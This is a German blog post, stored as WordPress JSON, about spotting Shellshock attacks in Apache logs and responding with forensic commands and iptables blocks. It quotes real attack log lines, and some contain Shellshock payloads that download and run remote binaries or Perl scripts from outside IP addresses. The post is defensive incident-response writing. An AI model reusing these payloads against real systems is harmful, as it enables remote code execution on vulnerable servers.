{"id":4292,"date":"2014-09-28T10:46:46","date_gmt":"2014-09-28T08:46:46","guid":{"rendered":"https:\/\/www.bdjl.de\/localhost\/?p=4292"},"modified":"2014-09-28T10:56:16","modified_gmt":"2014-09-28T08:56:16","slug":"shellshock-exploits","status":"publish","type":"post","link":"https:\/\/www.bdjl.de\/localhost\/?p=4292","title":{"rendered":"Shellshock exploits"},"content":{"rendered":"<p>Kaum ist der Bug bekannt, listet Exploit-DB einen <a href=\"http:\/\/www.exploit-db.com\/exploits\/34765\/\" target=\"_blank\">exploit<\/a> dazu und ein Metasploit Modul gibt es <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/commit\/ff5398bf3f46c057666f7a3d0afaf4c0d6912575\" target=\"_blank\">auch<\/a>. Das macht es leichter, in den eigenen Logs nach Angriffen zu suchen:<\/p>\n<blockquote><p>grep &#8222;{ :;};&#8220; \/var\/log\/apache2\/access.log<\/p><\/blockquote>\n<p>bzw. auch mit zgrep, sollen die komprimierten Logs ebenfalls einen Blick wert sein. Wer noch geiler grep-en will: <a href=\"http:\/\/rubular.com\/r\/FRoObXn9Kx\" target=\"_blank\">http:\/\/rubular.com\/r\/FRoObXn9Kx<\/a><\/p>\n<p>Und da sind sie dann auch schon: Einmal als ein Test auf CGI<\/p>\n<blockquote><p>89.207.135.125 &#8211; &#8211; [25\/Sep\/2014:10:34:22 +0200] &#8222;GET \/cgi-sys\/defaultwebpage.cgi HTTP\/1.0&#8220; 404 506 &#8222;-&#8220; &#8222;() { :;}; \/bin\/ping -c 1 198.101.206.138&#8220;<\/p><\/blockquote>\n<p>aber auch als Versuch, von anderen Seiten Executables oder Skripte nachzuladen:<\/p>\n<blockquote><p>66.150.114.30 &#8211; &#8211; [27\/Sep\/2014:04:56:38 +0200] &#8222;GET \/test HTTP\/1.0&#8220; 404 484 &#8222;-&#8220; &#8222;() { :;}; \/bin\/bash -c \\&#8220;wget -O \/var\/tmp\/ec.z 74.201.85.69\/ec.z;chmod +x \/var\/tmp\/ec.z;\/var\/tmp\/ec.z;rm -rf \/var\/tmp\/ec.z*\\&#8220;&#8220;<\/p>\n<p>192.227.213.66 &#8211; &#8211; [26\/Sep\/2014:16:09:16 +0200] &#8222;GET \/cgi-bin\/helpme HTTP\/1.0&#8220; 404 376 &#8222;-&#8220; &#8222;() { :;}; \/bin\/bash -c \\&#8220;cd \/dev\/shm;wget http:\/\/213.5.67.223\/jurat;curl -O \/tmp\/jurat http:\/\/213.5.67.223\/jurat ; perl \/tmp\/jurat;rm -rf \/tmp\/jurat\\&#8220;&#8220;<\/p><\/blockquote>\n<p>Man kann dann mal nach in den letzten 3 Tagen ge\u00e4nderten Dateien in verd\u00e4chtigen oder besonders relevanten Verzeichnissen suchen<\/p>\n<blockquote><p>find \/etc -type f -mtime -3 -printf &#8218;%TY-%Tm-%Td %TT %p\\n&#8216; | sort<\/p><\/blockquote>\n<p>oder mit<\/p>\n<blockquote><p>nmap localhost<\/p><\/blockquote>\n<p>nachsehen, welche Ports auf der eigenen Maschine inzwischen offen sind oder mit<\/p>\n<blockquote><p>netstat -tulpen<\/p><\/blockquote>\n<p>nach aktiven Verbindungen fanden. Aber so richtig was bringen d\u00fcrfte das auch nur, wenn man die Verzeichnisse gut eingrenzen kann und der erfolgreiche Angreifer nicht aufr\u00e4umte.<\/p>\n<p>Steht man auf Schlangen\u00f6l (wer w\u00fcrde dies nicht) blockiert man die IPs, von denen schon Angriffe kamen mit iptables. Am besten gleich, indem man sich eine function f\u00fcr die .bashrc schreibt:<\/p>\n<blockquote><p>function blockip () { \/sbin\/iptables -A INPUT -s $1 -j DROP ; }<\/p><\/blockquote>\n<p>Dann reicht ein<\/p>\n<blockquote><p>blockip 89.207.135.125,66.150.114.30<\/p><\/blockquote>\n<p>um zwei IPs zu blockieren &#8211; weitere kann man ja mit , getrennt noch hinten anf\u00fcgen.<\/p>\n<p>Lekt\u00fcre gef\u00e4llig? Z.B. <a href=\"http:\/\/blog.erratasec.com\/\" target=\"_blank\">hier<\/a> und <a href=\"http:\/\/www.solutionary.com\/resource-center\/blog\/2014\/09\/shellshock-accelerating-the-standard-timeline\/\" target=\"_blank\">da<\/a> und die jeweils verlinkten Seiten. Das bringt einem aber schlaflose N\u00e4chte &#8211; wohingegen: Schlangen\u00f6l beruhigt die Nerven.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kaum ist der Bug bekannt, listet Exploit-DB einen exploit dazu und ein Metasploit Modul gibt es auch. Das macht es leichter, in den eigenen Logs nach Angriffen zu suchen: grep &#8222;{ :;};&#8220; \/var\/log\/apache2\/access.log bzw. auch mit zgrep, sollen die komprimierten Logs ebenfalls einen Blick wert sein. Wer noch geiler grep-en will: http:\/\/rubular.com\/r\/FRoObXn9Kx Und da sind [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[471],"class_list":["post-4292","post","type-post","status-publish","format-standard","hentry","category-linux","tag-shellshock"],"_links":{"self":[{"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=\/wp\/v2\/posts\/4292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4292"}],"version-history":[{"count":6,"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=\/wp\/v2\/posts\/4292\/revisions"}],"predecessor-version":[{"id":4298,"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=\/wp\/v2\/posts\/4292\/revisions\/4298"}],"wp:attachment":[{"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.bdjl.de\/localhost\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}